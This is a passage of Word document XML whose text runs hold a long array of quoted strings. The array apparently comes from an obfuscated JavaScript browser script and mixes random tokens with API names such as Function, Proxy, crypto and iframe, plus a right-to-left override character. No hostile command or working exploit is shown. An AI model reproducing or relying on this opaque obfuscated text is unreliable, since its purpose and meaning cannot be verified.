      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA","b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "tkPwPo4mKI9qddij8FZr", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg","String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
